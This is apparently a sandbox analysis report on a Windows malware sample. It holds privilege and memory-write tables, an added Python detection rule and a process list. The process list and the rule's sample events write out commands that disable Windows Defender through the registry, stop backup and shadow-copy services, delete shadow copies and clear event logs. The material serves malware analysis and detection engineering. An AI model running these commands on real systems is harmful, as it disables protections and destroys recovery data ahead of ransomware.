Rows that show only a number are privileges the sandbox reported by LUID rather than by name; in winnt.h, 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege. The long wmic.exe runs enable the whole set of privileges held by the token, so they show that wmic ran, not what it was asked to do; the wevtutil.exe rows (SeSecurityPrivilege and SeBackupPrivilege) are the privileges needed to clear the Security event log and line up with the "Clears Windows event logs" signature.

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A
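Taken together, the signatures in this analysis describe one pre-encryption chain driven from the sample's own process: reg.exe disables the WinDefend service and deletes the EPP context-menu keys, vssadmin.exe and wmic.exe touch shadow copies, wevtutil.exe clears event logs, and net.exe and sc.exe are used against services. The page names those binaries but does not show the children's command lines. The script below is an added example and not part of the sandbox report: it shows how a detection engineer would turn these signatures into a rule over process-creation events, matching each child on image name plus command line and then raising an alert when one parent spawns several distinct tamper categories, which is what separates this chain from an administrator running vssadmin once. The event lines are constructed for illustration; PIDs 3480, 1292 and 948 are borrowed from the WriteProcessMemory table in this report, every other PID is made up, and the command lines are typical forms of each operation, not the ones this sample ran.

```python
import re
from collections import defaultdict

# Constructed process-creation events, one per line: ppid | pid | image | command line.
# Parent 3480 and children 1292 (net.exe) and 948 (sc.exe) are PIDs from the report's
# WriteProcessMemory table; every other PID and every command line is an illustrative
# assumption, not something the sandbox recorded.
SAMPLE_EVENTS = r"""
1000 | 3480 | C:\Users\Admin\AppData\Local\Temp\sample.exe | "C:\Users\Admin\AppData\Local\Temp\sample.exe"
3480 | 1292 | C:\Windows\SysWOW64\net.exe | net stop "SamSs" /y
3480 | 948 | C:\Windows\SysWOW64\sc.exe | sc config "SecurityHealthService" start= disabled
3480 | 4100 | C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f
3480 | 4104 | C:\Windows\SysWOW64\reg.exe | reg delete "HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP" /f
3480 | 4200 | C:\Windows\SysWOW64\vssadmin.exe | vssadmin.exe delete shadows /all /quiet
3480 | 4204 | C:\Windows\SysWOW64\Wbem\wmic.exe | wmic.exe shadowcopy delete
3480 | 4300 | C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl system
3480 | 4304 | C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl security
900 | 5000 | C:\Windows\System32\wevtutil.exe | wevtutil.exe qe Application /c:5
"""

# One rule per signature in the report: (category, image basenames, command-line pattern).
RULES = [
    ("defender_service_disabled", {"reg.exe"},
     re.compile(r"Services\\WinDefend.*\bStart\b.*\b4\b", re.I)),
    ("epp_context_menu_removed", {"reg.exe"},
     re.compile(r"\bdelete\b.*ContextMenuHandlers\\EPP", re.I)),
    ("shadow_copies_deleted", {"vssadmin.exe", "wmic.exe"},
     re.compile(r"delete\s+shadows|shadowcopy\s+delete", re.I)),
    ("event_log_cleared", {"wevtutil.exe"},
     re.compile(r"\b(cl|clear-log)\b", re.I)),
    ("service_stopped_or_disabled", {"net.exe", "sc.exe"},
     re.compile(r"\bstop\b|start=\s*disabled", re.I)),
]


def parse_events(text):
    """Parse 'ppid | pid | image | cmdline' lines into dicts."""
    events = []
    for line in text.strip().splitlines():
        ppid, pid, image, cmdline = (f.strip() for f in line.split(" | ", 3))
        events.append({"ppid": int(ppid), "pid": int(pid), "image": image, "cmdline": cmdline})
    return events


def classify(event):
    """Return the tamper categories an event matches, keyed on image basename and command line."""
    name = event["image"].rsplit("\\", 1)[-1].lower()
    return [category for category, images, pattern in RULES
            if name in images and pattern.search(event["cmdline"])]


def find_chains(events, min_categories=3):
    """Group hits by parent PID; a parent whose children cover at least min_categories
    distinct categories is reported as a defense-evasion / inhibit-recovery chain.
    Returns (chains, hits): chains maps parent PID to its sorted categories,
    hits is a list of (ppid, pid, category) for every matching event."""
    by_parent = defaultdict(set)
    hits = []
    for ev in events:
        for category in classify(ev):
            by_parent[ev["ppid"]].add(category)
            hits.append((ev["ppid"], ev["pid"], category))
    chains = {ppid: sorted(cats) for ppid, cats in by_parent.items() if len(cats) >= min_categories}
    return chains, hits


if __name__ == "__main__":
    chains, hits = find_chains(parse_events(SAMPLE_EVENTS))
    for ppid, pid, category in hits:
        print(f"pid {pid} (parent {ppid}): {category}")
    for ppid, categories in chains.items():
        print(f"ALERT parent {ppid} spawned {len(categories)} tamper categories: {', '.join(categories)}")
```

The lone wevtutil.exe query under parent 900 matches nothing, and a single vssadmin or net stop from an admin session would match one category without tripping the chain threshold; the alert fires only on the parent that accumulates several categories, which is the shape this report shows for PID 3480.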

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3480 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 1292 wrote to memory of 3484 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1292 wrote to memory of 3484 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1292 wrote to memory of 3484 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 1248 wrote to memory of 2548 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1248 wrote to memory of 2548 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1248 wrote to memory of 2548 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3700 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3700 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3700 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3652 wrote to memory of 3268 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3652 wrote to memory of 3268 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3652 wrote to memory of 3268 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 2688 wrote to memory of 2112 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 2688 wrote to memory of 2112 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 2688 wrote to memory of 2112 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 328 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 328 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 328 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 328 wrote to memory of 1788 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 328 wrote to memory of 1788 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 328 wrote to memory of 1788 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3328 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3328 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3328 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3872 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3872 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3872 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3676 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3676 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3676 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3676 wrote to memory of 956 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3676 wrote to memory of 956 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3676 wrote to memory of 956 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 60 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 60 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 60 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 1300 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 60 wrote to memory of 1300 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 60 wrote to memory of 1300 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2380 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2380 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2380 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2356 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2356 | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_13561" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13561" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_13561" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

